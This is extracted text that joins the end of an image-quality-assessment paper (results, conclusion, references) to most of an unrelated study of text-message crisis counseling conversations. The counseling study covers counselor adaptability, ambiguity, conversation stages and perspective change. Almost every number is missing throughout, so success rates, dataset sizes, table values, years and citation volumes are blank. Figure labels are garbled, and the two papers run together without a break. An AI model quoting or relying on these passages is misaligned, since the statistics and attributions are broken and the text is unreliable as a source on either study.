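    return srocc, krocc, plcc, rmse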
b. performance comparison
table i lists the srocc, krocc, plcc and rmse results of the ten metrics on the six databases, and the two best results in each row are highlighted in bold. overall, the methods that employ the gradient feature, such as fsim, gmsd, dasm and the proposed metric, perform well across all the databases. this partly demonstrates the validity of considering the degradation of gray-level changes in quality evaluation. furthermore, the proposed metric performs well, outperforming ssim and ssrm and competing with fsim and gmsd.
table i. comparison of the performance results (srocc, krocc, plcc and rmse) of the ten iqa metrics (psnr, ssim, ms-ssim, ifc, vif, fsim, gmsd, dasm, ssrm and the proposed metric) on the six public databases; the two best results in each row are marked in bold.
table ii. comparison of the srocc of the ten iqa metrics for each individual distortion type of the tid database (awgn, awgn-color, spatial-correlated, mask-noise, hf-noise, impulse-noise, quantization-noise, gb, denoising, jpeg, jp k, jpeg-trans-error, jp k-trans-error, pattern-noise, block-distortion, mean-shift, contrast change, saturation change, multiple-noise, comfort-noise, noisy-compression, color quantization, chromatic abbr., sparse sample); the two best results in each row are marked in bold.
among the six databases, tid has the highest number of distortion types. table ii lists the srocc results of the ten metrics for each individual distortion type of the tid database. the proposed algorithm performs well on a variety of distortion types. in particular, the proposed algorithm is outstanding for the jpeg, jp k and jpeg-trans-error distortion types, which are sensitive to variations.
iv. conclusion
in this paper, we discuss the problem of whether the change measured by the gradient corresponds to the change perceived by the hvs. considering that the ability of the hvs to perceive changes is affected by an upper threshold, we defined the adaptively truncating gradient and proposed a novel iqa index. numerical experimental results showed that this index performs well on multiple databases. in addition, more studies need to be conducted to address this problem due to its complexity. in future research, we expect to use machine learning methods to further understand this issue.
acknowledgment
this work was supported by the natural science foundation of shaanxi province under grant jm- .
references
[ ] z. wang, a. c. bovik, h. r. sheikh, and e. p. simoncelli, "image quality assessment: from error visibility to structural similarity," ieee trans.
image process., vol. , no. , pp. – , apr. . [ ] l. zhang, l. zhang, x. mou, and d. zhang, “fsim: a feature similarity index for image quality assessment,” ieee trans. image process., vol. , no. , pp. – , aug. . [ ] w. xue, l. zhang, x. mou, and a. c. bovik, “gradient magnitude similarity deviation: a highly effificient perceptual image quality index,” ieee trans. image process., vol. , no. , pp. – , feb. . [ ] w. sun, q. liao, j. xue, and f. zhou, “spsim: a superpixel-based similarity index for full-reference image quality assessment,” ieee trans. image process., vol. , no. , pp. – , sept. . [ ] l. ding, h. huang, and y. zang, “image quality assessment using directional anisotropy structure measurement,” ieee trans. image process., vol. , no. , pp. – , apr. . [ ] x. zhang, x. feng, w. wang, and w. xue, “edge strength similarity for image quality assessment,” ieee signal process. lett., vol. , no. , pp. – , apr. . [ ] z. wang and a. c. bovik, “bottom-up approaches for full-reference image quality assessment ,” in modern image quality assessment, vermont, vt, usa: morgan and claypool, , pp. – . [ ] h. r. sheikh, a. c. bovik, and g. de veciana, “an information fifidelity criterion for image quality assessment using natural scene statistics,” ieee trans. image process., vol. , no. , pp. – , dec. . [ ] h. r. sheikh and a. c. bovik, “image information and visual quality,” ieee trans. image process., vol. , no. , pp. – , feb. . [ ] z. wang, e. p. simoncelli, and a. c. bovik, “multi-scale structural similarity for image quality assessment,” in proc. ieee asilomar conf. signals, syst. comput., nov. , pp. – . [ ] a. ahar, a. barri and p. schelkens, "from sparse coding significance to perceptual quality: a new approach for image quality assessment," ieee trans. image process., vol. , no. , pp. - , feb. . [ ] n. ponomarenko, o. ieremeiev, v. lukin, k. egiazarian, l. jin, j, astola, b. vozel, k. chehdi, m. carli, f. battisti, and c.-c. jay kuo, “color image database tid : peculiarities and preliminary results,” in proc. th eur. workshop vis. inf. process., jun. , pp. – . [ ] n. ponomarenko, v. lukin, a. zelensky, k. egiazarian, m. carli, and f. battisti, “tid a database for evaluation of full-reference visual quality assessment metrics,” adv. modern radioelectron., vol. , pp. – , may. . [ ] c. larson and d. m. chandler, categorical image quality (csiq) database [online]. available: http://vision.okstate.edu/csiq [ ] h. r. sheikh, k. seshadrinathan, a. k. moorthy, z. wang, a. c. bovik, and l. k. cormack, image and video quality assessment research at live [online]. available: http://live.ece.utexas.edu /research /quality [ ] a. ninassi, p. le callet, and f. autrusseau, subjective quality assessment ivc database [online]. available: http://www .irccyn. ecnantes.fr/ivcdb [ ] d. m. chandler and s. s. hemami, a database [online]. available: http://foulard.ece.cornell.edu/dmc /vsnr/vsnr.htm large-scale analysis of counseling conversations: an application of natural language processing to mental health tim althoff∗, kevin clark∗, jure leskovec stanford university {althoff, kevclark, jure}@cs.stanford.edu abstract mental illness is one of the most pressing pub- lic health issues of our time. while counsel- ing and psychotherapy can be effective treat- ments, our knowledge about how to conduct successful counseling conversations has been limited due to lack of large-scale data with la- beled outcomes of the conversations. 
in this paper, we present a large-scale, quantitative study on the discourse of text-message-based counseling conversations. we develop a set of novel computational discourse analysis meth- ods to measure how various linguistic aspects of conversations are correlated with conver- sation outcomes. applying techniques such as sequence-based conversation models, lan- guage model comparisons, message cluster- ing, and psycholinguistics-inspired word fre- quency analyses, we discover actionable con- versation strategies that are associated with better conversation outcomes. introduction mental illness is a major global health issue. in the u.s. alone, . million adults ( . %) experience mental illness in a given year (national institute of mental health, ). in addition to the person di- rectly experiencing a mental illness, family, friends, and communities are also affected (insel, ). in many cases, mental health conditions can be treated effectively through psychotherapy and coun- seling (world health organization, ). however, it is far from obvious how to best conduct counsel- ing conversations. such conversations are free-form without strict rules, and involve many choices that *both authors contributed equally to the paper. could make a difference in someone’s life. thus far, quantitative evidence for effective conversation strategies has been scarce, since most studies on counseling have been limited to very small sample sizes and qualitative observations (e.g., labov and fanshel, ( ); haberstroh et al., ( )). how- ever, recent advances in technology-mediated coun- seling conducted online or through texting (haber- stroh et al., ) have allowed counseling ser- vices to scale with increasing demands and to col- lect large-scale data on counseling conversations and their outcomes. here we present the largest study on counseling conversation strategies published to date. we use data from an sms texting-based counseling service where people in crisis (depression, self-harm, sui- cidal thoughts, anxiety, etc.), engage in therapeutic conversations with counselors. the data contains millions of messages from eighty thousand counsel- ing conversations conducted by hundreds of coun- selors over the course of one year. we develop a set of computational methods suited for large-scale dis- course analysis to study how various linguistic as- pects of conversations are correlated with conversa- tion outcomes (collected via a follow-up survey). we focus our analyses on counselors instead of individual conversations because we are interested in general conversation strategies rather than prop- erties of specific issues. we find that there are sig- nificant, quantifiable differences between more suc- cessful and less successful counselors in how they conduct conversations. our findings suggest actionable strategies that are associated with successful counseling: transactions of the association for computational linguistics, vol. , pp. – , . action editor: lillian lee. submission batch: / ; revision batch: / ; / published / . c© association for computational linguistics. distributed under a cc-by . license. . adaptability (section ): measuring the dis- tance between vector representations of the lan- guage used in conversations going well and go- ing badly, we find that successful counselors are more sensitive to the current trajectory of the conversation and react accordingly. . 
dealing with ambiguity (section ): we de- velop a clustering-based method to measure differences in how counselors respond to very similar ambiguous situations. we learn that successful counselors clarify situations by writ- ing more, reflect back to check understanding, and make their conversation partner feel more comfortable through affirmation. . creativity (section . ): we quantify the di- versity in counselor language by measuring cluster density in the space of counselor re- sponses and find that successful counselors re- spond in a more creative way, not copying the person in distress exactly and not using too generic or “templated” responses. . making progress (section ): we develop a novel sequence-based unsupervised conversa- tion model able to discover ordered conversa- tion stages common to all conversations. ana- lyzing the progression of stages, we determine that successful counselors are quicker to get to know the core issue and faster to move on to collaboratively solving the problem. . change in perspective (section ): we de- velop novel measures of perspective change us- ing psycholinguistics-inspired word frequency analysis. we find that people in distress are more likely to be more positive, think about the future, and consider others, when the coun- selors bring up these concepts. we further show that this perspective change is associated with better conversation outcomes consistent with psychological theories of depression. further, we demonstrate that counseling success on the level of individual conversations is predictable using features based on our discovered conversation strategies (section ). such predictive tools could be used to help counselors better progress through the conversation and could result in better counseling practices. the dataset used in this work has been re- leased publicly and more information on dataset ac- cess can be found at http://snap.stanford. edu/counseling. although we focus on crisis counseling in this work, our proposed methods more generally apply to other conversational settings and can be used to study how language in conversations relates to con- versation outcomes. related work our work relates to two lines of research: therapeutic discourse analysis & psycholinguis- tics. the field of conversation analysis was born in the s out of a suicide prevention center (sacks and jefferson, ; van dijk, ). since then conversation analysis has been applied to various clinical settings including psychotherapy (labov and fanshel, ). work in psycholinguistics has demonstrated that the words people use can re- veal important aspects of their social and psycho- logical worlds (pennebaker et al., ). previous work also found that there are linguistic cues as- sociated with depression (ramirez-esparza et al., ; campbell and pennebaker, ) as well as with suicude (pestian et al., ). these find- ings are consistent with beck’s cognitive model of depression ( ; cognitive symptoms of depres- sion precede the affective and mood symptoms) and with pyszczynski and greenberg’s self-focus model of depression ( ; depressed persons engage in higher levels of self-focus than non-depressed per- sons). in this work, we propose an operationalized psy- cholinguistic model of perspective change and fur- ther provide empirical evidence for these theoretical models of depression. large-scale computational linguistics applied to conversations. 
large-scale studies have re- vealed subtle dynamics in conversations such as co- ordination or style matching effects (niederhoffer and pennebaker, ; danescu-niculescu-mizil, ) as well as expressions of social power and status (bramsen et al., ; danescu-niculescu- mizil et al., ). other studies have connected writing to measures of success in the context of re- quests (althoff et al., ), user retention (althoff and leskovec, ), novels (ashok et al., ), and scientific abstracts (guerini et al., ). prior http://snap.stanford.edu/counseling http://snap.stanford.edu/counseling work has modeled dialogue acts in conversational speech based on linguistic cues and discourse coher- ence (stolcke et al., ). unsupervised machine learning models have also been used to model con- versations and segment them into speech acts, top- ical clusters, or stages. most approaches employ hidden markov model-like models (barzilay and lee, ; ritter et al., ; paul, ; yang et al., ) which are also used in this work to model progression through conversation stages. very recently, technology-mediated counseling has allowed the collection of large datasets on coun- seling. howes et al. ( ) find that symptom sever- ity can be predicted from transcript data with com- parable accuracy to face-to-face data but suggest that insights into style and dialogue structure are needed to predict measures of patient progress. counseling datasets have also been used to predict the conversa- tion outcome (huang, ) but without modeling the within-conversation dynamics that are studied in this work. other work has explored how novel inter- faces based on topic models can support counselors during conversations (dinakar et al., a; b; ; chen, ). our work joins these two lines of research by de- veloping computational discourse analysis methods applicable to large datasets that are grounded in ther- apeutic discourse analysis and psycholinguistics. dataset description in this work, we study anonymized counseling con- versations from a not-for-profit organization provid- ing free crisis intervention via sms messages. text- based counseling conversations are particularly well suited for conversation analysis because all interac- tions between the two dialogue partners are fully ob- served (i.e., there are no non-textual or non-verbal cues). moreover, the conversations are important, constrained to dialogue between two people, and outcomes can be clearly defined (i.e., we follow up with the conversation partner as to whether they feel better afterwards), which enables the study of how conversation features are associated with actual out- comes. counseling process. any person in distress can text the organization’s public number. incoming re- quests are put into a queue and an available coun- dataset statistics conversations , conversations with survey response , ( . %) messages . million messages with survey response , ( . %) counselors messages per conversation* . words per message* . table : basic dataset statistics. rows marked with * are computed over conversations with survey responses. selor picks the request from the queue and engages with the incoming conversation. we refer to the cri- sis counselor as the counselor and the person in dis- tress as the texter. after the conversation ends, the texter receives a follow-up question (“how are you feeling now? better, same, or worse?”) which we use as our conversation quality ground-truth (we use binary labels: good versus same/worse, since we care about improving the situation). 
in contrast to previous work that has used human judges to rate a caller’s crisis state (kalafat et al., ), we di- rectly obtain this feedback from the texter. further- more, the counselor fills out a post-conversation re- port (e.g., suicide risk, main issue such as depres- sion, relationship, self-harm, suicide, etc.). all crisis counselors receive extensive training and commit to weekly shifts for a full year. dataset statistics. our dataset contains coun- selors and . million messages in , conversa- tions between november and november (see table ). all system messages (e.g., instruc- tions), as well as texts that contain survey responses (revealing the ground-truth label for the conversa- tion) were filtered out. out of these conversations, we use the , , or . %, that contain a ground- truth label (whether the texter feels better or the same/worse after the conversation) for the follow- ing analyses. conversations span a variety of issues of different difficulties (see rows one and two of ta- ble ). approval to analyze the dataset was obtained from the stanford irb. defining counseling quality the primary goal of this paper is to study strategies that lead to conversations with positive outcomes. thus, we require a ground-truth notion of conver- sation quality. in principle, we could study individ- na depressed relationship self harm family suicide stress anxiety other success rate . . . . . . . . . frequency . . . . . . . . . frequency with more successful counselors . . . . . . . . . frequency with less successful counselors . . . . . . . . . table : frequencies and success rates for the nine most common conversation issues (na: not available). on average, more and less successful counselors face the same distribution of issues. ual conversations and aim to understand what fac- tors make the conversation partner (texter) feel bet- ter. however, it is advantageous to focus on the conversation actor (counselor) instead of individual conversations. there are several benefits of focusing analy- ses on counselors (rather than individual conversa- tions): first, we are interested in general conversa- tion strategies rather than properties of main issues (e.g., depression vs. suicide). while each conver- sation is different and will revolve around its main issue, we assume that counselors have a particular style and strategy that is invariant across conversa- tions. second, we assume that conversation qual- ity is noisy. even a very good counselor will face some hard conversations in which they do every- thing right but are still unable to make their conver- sation partner feel better. over time, however, the “true” quality of the counselor will become appar- ent. third, our goal is to understand successful con- versation strategies and to make use of these insights in counselor training. focusing on the counselor is helpful in understanding, monitoring, and improv- ing counselors’ conversation strategies. more vs. less successful counselors. we split the counselors into two groups and then compare their behavior. out of the counselors with more than labeled conversations of at least messages each, we use the most successful counselors as “more successful” counselors and the bottom as “less successful” counselors. their average success rates are . - . % and . - . %, respectively. 
while the counselor-level analysis is of primary con- cern, we will also differentiate between counselor behavior in “positive” versus “negative” conversa- tions (i.e., those that will eventually make the texter feel better vs. not). thus, in the remainder of the paper we differentiate between more vs. less suc- cessful counselors and positive vs. negative conver- - - - - - portion of conversation (% of messages) a ve ra ge m es sa ge le ng th more successful counselors, positive conversations more successful counselors, negative conversations less successful counselors, positive conversations less successful counselors, negative conversations figure : differences in counselor message length (in #tokens) over the course of the conversation are larger between more and less successful counselors (blue cir- cle/red square) than between positive and negative con- versations (solid/dashed). error bars in all plots corre- spond to bootstrapped % confidence intervals using the member bootstrapping technique from ren et al. ( ). sations. studying the cross product of counselors and conversations allows us to gain insights on how both groups behave in positive and negative conver- sations. for example, figure illustrates why differ- entiating between counselors and as well as conver- sations is necessary: differences in counselor mes- sage length over the course of the conversation are bigger between more and less successful counselors than between positive and negative conversations. initial analysis. before focusing on detailed anal- yses of counseling strategies we address two impor- tant questions: do counselors specialize in certain issues? and, do successful counselors appear suc- cessful only because they handle “easier” cases? to gain insights into the “specialization hypoth- esis” we make use the counselor annotation of the main issue (depression, self-harm, etc.). we com- pare success rates of counselors across different issues and find that successful counselors have a higher fraction of positive conversations across all issues and that less successful counselors typically do not excel at a particular issue. thus, we conclude that counseling quality is a general trait or skill and supporting that the split into more and less success- ful counselors is meaningful. another simple explanation of the differences be- tween more and less successful counselors could be that successful counselors simply pick “easy” issues. however, we find that this is not the case. in par- ticular, we find that both counselor groups are very similar in how they select conversations from the queue (picking the top-most in . % vs. . %, respectively), work similar shifts, and handle a sim- ilar number of conversations simultaneously ( . vs. . ). further, we find that both groups face sim- ilar distributions of issues over time (see table ). we attribute the largest difference, “na” (main issue not reported), to the more successful counselors be- ing more diligent in filling out the post-conversation report and having fewer conversations that end be- fore the main issue is introduced. counselor adaptability in the remainder of the paper we focus on factors that mediate the outcome of a conversation. first, we examine whether successful counselors are more aware that their current conversation is going well or badly and study how the counselor adapts to the situation. we investigate this question by looking for language differences between positive and neg- ative conversations. 
in particular, we compute a distance measure between the language counselors use in positive conversations and the language coun- selors use in negative conversations and observe how this distance changes over time. we capture the time dimension by breaking up each conversation into five even chunks of messages. then, for each set of counselors (more successful or less successful), conversation outcome (positive or negative), and chunk (first %, second %, etc.), we build a tf-idf vector of word occurrences to represent the language of counselors within this subset. we use the global inverse document (i.e., conversation) frequencies instead of the ones from each subset to make the vectors directly comparable and control for different counselors having differ- ent numbers of conversations by weighting conver- sations so all counselors have equal contributions. we then measure the difference between the “posi- - - - - - ortlon of conversdtlon (% of pessdges) . . . . . . . . d ls td nc e be tw ee n po sl tlv e d nd n eg dt lv e co nv er sd tlo ns ore successful counselors less successful counselors figure : more successful counselors are more varied in their language across positive/negative conversations, suggesting they adapt more. all differences between more successful and less successful counselors except for the - bucket were found to be statistically significant (p < . ; bootstrap resampling test). tive” and “negative” vector representations by taking the cosine distance in the induced vector space. we also explored using jensen-shannon divergence be- tween traditional probabilistic language models and found these methods gave similar results. results. we find more successful counselors are more sensitive to whether the conversation is going well or badly and vary their language accordingly (figure ). at the beginning of the conversation, the language between positive and negative conver- sations is quite similar, but then the distance in lan- guage increases over time. this increase in distance is much larger for more successful counselors than less successful ones, suggesting they are more aware of when conversations are going poorly and adapt their counseling more in an attempt to remedy the situation. reacting to ambiguity observing that successful counselors are better at adapting to the conversation, we next examine how counselors differ and what factors determine the dif- ferences. in particular, domain experts have sug- gested that more successful counselors are better at handling ambiguity in the conversation (levitt and jacques, ). here, we use ambiguity to refer to the uncertainty of the situation and the texter’s ac- tual core issue resulting from insufficiently short or uncertain descriptions. does initial ambiguity of the situation negatively affect the conversation? how do more successful counselors deal with ambiguous sit- uations? [ , ] ( , ] ( , ] ( , ] ( , ] length of situation setter (#tokens) . . . . . f ra ct io n o f p o si tiv e c o n v. more successful less successful figure : more ambiguous situations (length of situation setter) are less likely to result in positive conversations. ( , ] ( , ] ( , ] ( , ] ( , ] length of situation setter (#tokens) . . . . . . |r e sp o n se | / |s itu a tio n s e tt e r| counselor quality more successful less successful figure : all counselors react to short, ambiguous mes- sages by writing more (relative to the texter message) but more successful counselors do it more than less success- ful counselors. ambiguity. 
throughout this section we measure ambiguity in the conversation as the shortness of the texter’s responses in number of words. while ambi- guity could also be measured through concreteness ratings of the words in each message (e.g., using concreteness ratings from brysbaert et al. ( )), we find that results are very similar and that length and concreteness are strongly related and hard to distinguish. . initial ambiguity and situation setter it is challenging to measure ambiguity and reactions to ambiguity at arbitrary points throughout the con- versation since it strongly depends on the context of the entire conversation (i.e., all earlier messages and questions). however, we can study nearly identi- cal beginnings of conversations where we can di- rectly compare how more successful and less suc- cessful counselors react given nearly identical situa- tions (the texter first sharing their reason for texting in). we identify the situation setter within each con- versation as the first long message by the texter (typ- ically a response to a “can you tell me more about what is going on?” question by the counselor). results. we find that ambiguity plays an important role in counseling conversations. figure shows that more ambiguous situations (shorter length of situation setter) are less likely to result in success- ful conversations (we obtain similar results when measuring concreteness (brysbaert et al., ) di- rectly). further, we find that counselors generally react to short and ambiguous situation setters by writing significantly more than the texters (figure ; if counselors wrote exactly as much as the texter, we would expect a horizontal line y = ). how- ever, more successful counselors react more strongly to ambiguous situations than less successful coun- selors. . how to respond to ambiguity having observed that ambiguity plays an important role in counseling conversations, we now examine in greater detail how counselors respond to nearly identical situations. we match situation setters by representing them through tf-idf vectors on bigrams and find similar situation setters as nearest neighbors within a certain cosine distance in the induced space. we only con- sider situation setters that are part of a dense cluster with at least neighbors, allowing us to compare follow-up responses by the counselors ( / situation setters were part of one of such clus- ters). we also used distributed word embeddings (e.g., (mikolov et al., )) instead of tf-idf vec- tors but found the latter to produce better clusters. based on counselor training materials we hypoth- esize that more successful counselors • address ambiguity by writing more themselves, • use more check questions (statements that tell the conversation partner that you understand threshold manually set after qualitative analysis of matches from randomly chosen clusters. results were not overly sensitive to threshold choice, choice of representation (e.g., word vectors), and distance measure (e.g., euclidean). more s. less s. test % conversations successful . . *** #messages in conversation . . *** situation setter length (#tokens) . . *** c response length (#tokens) . . *** t response length (#tokens) . . *** % cosine sim. c resp. to context . . *** % cosine sim. t resp. to context . . – % c resp. w check question . . *** % c resp. w suicide check . . *** % c resp. w thanks . . *** % c resp. w hedges . . *** % c resp. w surprise . . – table : differences between more and less success- ful counselors (c; more s. and less s.) 
in responses to nearly identical situation setters (sec. . ) by the texter (t). last column contains significance levels of wilcoxon signed rank tests (*** p < . , – p > . ). them while avoiding the introduction of any opinion or advice (labov and fanshel, ); e.g.“that sounds like...”), • check for suicidal thoughts early (e.g., “want to die”), • thank the texter for showing the courage to talk to them (e.g., “appreciate”), • use more hedges (mitigating words used to lessen the impact of an utterance; e.g., “maybe”, “fairly”), • and that they are less likely to respond with sur- prise (e.g., “oh, this sounds really awful”). a set of regular expressions is used to detect each class of responses (similar to the examples above). results. we find several statistically significant dif- ferences in how counselors respond to nearly iden- tical situation setters (see table ). while situation setters tend to be slightly longer for more success- ful counselors (suggesting that conversations are not perfectly randomly assigned), counselor responses are significantly longer and also spur longer texter responses. further, the more successful counselors respond in a way that is less similar to the original situation setter (measured by cosine similarity in tf- idf space) compared to less successful counselors (but the texter’s response does not seem affected). we do find that more successful counselors use more check questions, check for suicide ideation more of- ten, show the texter more appreciation, and use more hedges, but we did not find a significant difference with respect to responding with surprise. more successful less successful counselor quality # s im ila r co u n se lo r re a ct io n s conversation quality positive negative figure : more successful counselors use less com- mon/templated responses (after the texter first explains the situation). this suggests that they respond in a more creative way. there is no significant difference between positive and negative conversations. . response templates and creativity in section . , we observed that more successful counselors make use of certain templates (including check questions, checks for suicidal thoughts, affir- mation, and using hedges). while this could suggest that counselors should stick to such predefined tem- plates, we find that, in fact, more successful coun- selors do respond in more creative ways. we define a measure of how “templated” the counselors responses are by counting the number of similar responses in tf-idf space for the counselor reaction (c.f., section . ; again using a manually defined and validated threshold on cosine distance). figure shows that more successful counselors use less common/templated questions. this sug- gests that while more successful counselors ques- tions follow certain patterns, they are more creative in their response to each situation. this tailoring of responses requires more effort from the counselor, which is consistent with the results in figure that showed that more successful counselors put in more effort in composing longer messages as well. ensuring conversation progress after demonstrating content-level differences be- tween counselors, we now explore temporal differ- ences in how counselors progress through conversa- tions. using an unsupervised conversation model, we are able to discover distinct conversation stages and find differences between counselors in how they move through these stages. 
we further provide ev- idence that these differences could be related to power and authority by measuring linguistic coor- dination between the counselor and texter. . unsupervised conversation model counseling conversations follow a common struc- ture due to the nature of conversation as well as counselor training. typically, counselors first intro- duce themselves, get to know the texter and their situation, and then engage in constructive prob- lem solving. we employ unsupervised conversation modeling techniques to capture this stage-like struc- ture within conversations. our conversation model is a message-level hid- den markov model (hmm). figure illustrates the basic model where hidden states of the hmm rep- resent conversation stages. unlike in prior work on conversation modeling, we impose a fixed ordering on the stages and only allow transitions from the cur- rent stage to the next one (figure ). this causes it to learn a fixed dialogue structure common to all of the counseling sessions as opposed to conversa- tion topics. furthermore, we separately model coun- selor and texter messages by treating their turns in the conversation as distinct states. we train the con- versation model with expectation maximization, us- ing the forward-backward algorithm to produce the distributions during each expectation step. we ini- tialized the model with each stage producing mes- sages according to a unigram distribution estimated from all messages in the dataset and uniform transi- tion probabilities. the unigram language models are defined over all words occurring more than times (over % of words in the dataset), with other words replaced by an unknown token. results. we explored training the model with vari- ous numbers of stages and found five stages to pro- duce a distinct and easily interpretable representa- tion of a conversation’s progress. table shows the words most unique to each stage. the first and last stages consist of the basic introductions and wrap- ups common to all conversations. in stage , the texter introduces the main issue, while the counselor asks for clarifications and expresses empathy for the situation. in stage , the counselor and texter dis- cuss the problem, particularly in relation to the other s ck ws w ,i s s w ,i w ,i ws ws figure : our conversation model generates a particular conversation ck by first generating a sequence of hid- den states s , s , ... according to a markov model. each state si then generates a message as a bag of words wi, , wi, , ... according a unigram language model wsi . counselor turn texter turn stage c stage stage k c ck t t tk figure : allowed state transitions for the conversation model. counselor and texter messages are produced by distinct states and conversations must progress through the stages in increasing order. people involved. in stage , the counselor and tex- ter discuss actionable strategies that could help the texter. this is a well-known part of crisis counselor training called “collaborative problem solving.” . analyzing counselor progression do counselors differ in how much time they spend at each stage? in order to explore how counselors progress through the stages, we use the viterbi al- gorithm to assign each conversation the most likely sequence of stages according to our conversation model. we then compute the average duration in messages of each stage for both more and less suc- cessful counselors. 
we control for the different distributions of positive and negative conversations among more successful and less successful coun- selors by giving the two classes of conversations equal weight and control for different conversation lengths by only including conversations between and messages long. results. we find that more successful counselors are quicker to move past the earlier stages, partic- stage interpretation top words for texter top words for counselor introductions hi, hello, name, listen, hey hi, name, hello, hey, brings problem introduction dating, moved, date, liked, ended gosh, terrible, hurtful, painful, ago problem exploration knows, worry, burden, teacher, group react, cares, considered, supportive, wants problem solving write, writing, music, reading, play hobbies, writing, activities, distract, music wrap up goodnight, bye, thank, thanks, appreciate goodnight, , anytime, luck, table : the top words for counselors and texters with greatest increase in likelihood of appearing in each stage. the model successfully identifies interpretable stages consistent with counseling guidelines (qualitative interpretation based on stage assignment and model parameters; only words occurring more than five hundred times are shown). stage . . . . . . . . . s ta ge d ur at io n (p er ce nt o f c on ve rs at io n) more successful counselors less successful counselors figure : more successful counselors are quicker to get to know texter and issue (stage ) and use more of their time in the “problem solving” phase (stage ). ularly stage , and spend more time in later stages, particularly stage (figure ). this suggests they are able to more quickly get to know the texter and then spend more time in the problem solving phase of the conversation, which could be one of the rea- sons they are more successful. . coordination and power differences one possible explanation for the more successful counselors’ ability to quickly move through the early stages is that they have more “power” in the conversation and can thus exert more control over the progression of the conversation. we explore this idea by analyzing linguistic coordination, which measures how much the conversation partners adapt to each other’s conversational styles. research has shown that conversation participants who have a greater position of power coordinate less (i.e., they do not adapt their linguistic style to mimic the other conversational participant as strongly) (danescu- niculescu-mizil et al., ). in our analysis, we use the “aggregated ” coordi- nation measure c(b, a) from danescu-niculescu- mizil ( ), which measures how much group b coordinates to group a (a higher number means more coordination). the measure is computed by counting how often specific markers (e.g., auxiliary verbs) are exhibited in conversations. if someone tends to use a particular marker right after their con- versation partner uses that marker, it suggests they are coordinating to their partner. formally, let set s be a set of exchanges, each involving an initial utterance u by a ∈ a and a reply u by b ∈ b. then the coordination of b to a according to a linguistic marker m is: cm(b, a) = p(emu →u |e m u )−p(emu →u ) where emu is the event that utterance u exhibits m (i.e., contains a word from category m) and emu →u is the event that reply u to u exhibits m. the prob- abilities are estimated across all exchanges in s. to aggregate across different markers, we average the coordination values of cm(b, a) over all markers m to get a macro-average c(b, a). 
the coordination between groups b and a is then defined as the mean of the coordinations of all members of group b to- wards the group a. we use eight markers from danescu-niculescu- mizil ( ), which are considered to be processed by humans in a generally non-conscious fashion: ar- ticles, auxiliary verbs, conjunctions, high-frequency adverbs, indefinite pronouns, personal pronouns, prepositions, and quantifiers. results. texters coordinate less than coun- selors, with texters having a coordination value of c(texter, counselor)= . compared to the counselor’s c(counselor, texter)= . , suggest- ing that the texters hold more “power” in the conversation. however, more successful counselors coordinate less than less successful ones (c(more succ. counselors, texter)= . vs. c(less succ. counselors, texter)= . ). all differ- ences are statistically significant (p < . ; mann- whitney u test). this suggests that more successful counselors act with more control over the conversa- tion, which could explain why they are quicker to make it through the initial conversation stages. facilitating perspective change thus far, we have studied conversation dynamics and their relation to conversation success from the counselor perspective. in this section, we show that perspective change in the texter over time is asso- ciated with a higher likelihood of conversation suc- cess. prior work has shown that day-to-day changes in writing style are associated with positive health outcomes (campbell and pennebaker, ), and existing theories link depression to a negative view of the future (pyszczynski et al., ) and a self- focusing style (pyszczynski and greenberg, ). here, we propose a novel measure to quantify three orthogonal aspects of perspective change within a single conversation: time, self, and sentiment. fur- ther, we show that the counselor might be able to actively induce perspective change. time. texters start explaining their issue largely in terms of the past and present but over time talk more about the future (see figure a; each plot shows the relative amount of words in the liwc past, present, and future categories (tausczik and pennebaker, )). we find that texters writing more about the future are more likely to feel better after the conversation. this suggests that changing the perspective from issues in the past towards the future is associated with a higher likelihood of suc- cessfully working through the crisis. self. another important aspect of behavior change is to what degree the texter is able to change their perspective from talking about themselves to con- sidering others and potentially the effect of their sit- uation on others (pyszczynski and greenberg, ; campbell and pennebaker, ). we measure how much the texter is focused on themselves by the rela- tive amount of first person singular pronouns (i, me, mine) versus third person singular/plural pronouns (she, her, him / they, their), again using liwc. fig- ure b shows that a smaller amount of self-focus is associated with more successful conversations (pro- viding support for the self-focus model of depres- sion (pyszczynski and greenberg, )). we hy- pothesize that the lack of difference at the end of the conversation is due to conversation norms such as thanking the counselor (“i really appreciate it.”) even if the texter does not actually feel better. sentiment. lastly, we investigate how much a change in sentiment of the texter throughout the con- versation is associated with conversation success. 
we measure sentiment as the relative fraction of pos- itive words using the liwc posemo and negemo sentiment lexicons. the results in figure c show that texters always start out more negative (value be- low . ), but that the sentiment becomes more posi- tive over time for both positive and negative conver- sations. however, we find that the separation be- tween both groups grows larger over time, which suggests that a positive perspective change through- out the conversation is related to higher likelihood of conversation success. we find that both curves increase significantly at the very end of the con- versation. again, we attribute this to conversation norms such as thanking the counselor for listening even when the texter does not actually feel better. together with the result on talking about the fu- ture, these findings are consistent with the theory of pyszczynski et al. ( ) that depression is related to a negative view of the future. role of a counselor. given that positive conver- sations often exhibit perspective change, a natural question is how counselors can encourage perspec- tive change in the texter. we investigate this by ex- ploring the hypothesis that the texter will tend to talk more about something (e.g., the future), if the coun- selor first talks about it. we measure this tendency using the same coordination measures as section . except that instead of using stylistic liwc markers (e.g., auxiliary verbs, quantifiers), we use the liwc markers relevant to the particular aspect of perspec- tive change (e.g., future, heshe, posemo). in all cases we find a statistically significant (p < . ; mann-whitney u-test) increase in the likelihood of the texter using a liwc marker if the counselor used it in the previous message (~ - % change). this link between perspective change and how the counselor conducts the conversation suggests that the coun- selor might be able to actively induce measurable perspective change in the texter. - - - - - ortion of fonversation (% of pessages) . . . . . . . . . . ) ut ur e re la tiv e fr eq ue nf y ositive fonversations egative fonversations - - - - - ortion of conversation (% of pessages) . . . . . . . . . . as t r el at iv e fr eq ue nc y ositive conversations egative conversations - - - - - portion of conversation (% of pessages) . . . . . . . . . p re se nt r el at iv e fr eq ue nc y positive conversations egative conversations - - - - - portion of conversation (% of pessages) . . . . el f r el at iv e fr eq ue nc y positive conversations egative conversations - - - - - portion of conversation (% of pessages) . . . . . p os ep o re la tiv e fr eq ue nc y positive conversations egative conversations a : past b: self c: sentiment a : present a : future figure : a: throughout the conversation there is a shift from talking about the past to future, where in positive conversations this shift is greater; b: texters that talk more about others more often feel better after the conversation; c: more positive sentiment by the texter throughout the conversation is associated with successful conversations. predicting counseling success in this section, we combine our quantitative insights into a prediction task. we show that the linguistic as- pects of crisis counseling explored in previous sec- tions have predictive power at the level of individ- ual conversations by evaluating their effectiveness as features in classifying the outcome of conversations. 
